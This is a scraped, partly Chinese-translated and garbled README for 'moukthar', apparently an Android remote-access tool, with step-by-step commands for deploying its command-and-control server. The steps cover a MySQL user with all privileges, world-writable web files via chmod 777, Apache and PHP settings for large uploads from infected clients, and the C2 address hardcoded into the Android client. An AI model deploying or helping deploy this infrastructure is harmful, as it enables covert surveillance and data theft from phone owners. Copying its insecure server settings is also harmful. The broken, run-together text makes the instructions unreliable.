moukthar
1.0.0
Android的遠程管理工具
git clone https://github.com/Tomiwa-Ot/moukthar.git/var/www/html/並安裝依賴項 mv moukthar/Server/* /var/www/html/
cd /var/www/html/c2-server
composer install
cd /var/www/html/web-socket/
composer install
cd /var/www
chown -R www-data:www-data .
chmod -R 777 .android和密碼: android CREATE USER ' android '@ ' localhost ' IDENTIFIED BY ' your-password ' ;
GRANT ALL PRIVILEGES ON * . * TO ' android ' @ ' localhost ' ;
FLUSH PRIVILEGES;c2-server/.env和web-socket/.env中設置數據庫憑據database.sql php Server/web-socket/App.php
# OR
sudo mv Server/websocket.service /etc/systemd/system/
sudo systemctl daemon-reload
sudo systemctl enable websocket.service
sudo systemctl start websocket.service/etc/apache2/sites-available/000-default.conf <VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html/c2-server
DirectoryIndex app.php
Options -Indexes
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
/etc/apache2/apache2.conf Comment this section
#< Directory />
# Options FollowSymLinks
# AllowOverride None
# Require all denied
#</ Directory >
Add this
< Directory /var/www/html/c2-server>
Options -Indexes
DirectoryIndex app.php
AllowOverride All
Require all granted
</ Directory >/etc/php/*.*/apache2/php.ini * .*/phpache2/php.ini ; Increase size to permit large file uploads from client
upload_max_filesize = 128M
; Set post_max_size to upload_max_filesize + 1
post_max_size = 129Mc2-server/src/View/home.php和c2-server/src/View/features/files.php中設置<script>標籤中的Web套接字服務器地址。 const ws = new WebSocket('ws://IP_ADDRESS:8080'); sudo a2enmod rewrite && sudo service apache2 restartfunctionality/Utils.java中設置C2服務器和Web插座服務器地址 public static final String C2_SERVER = "http://localhost" ;
public static final String WEB_SOCKET_SERVER = "ws://localhost:8080" ;







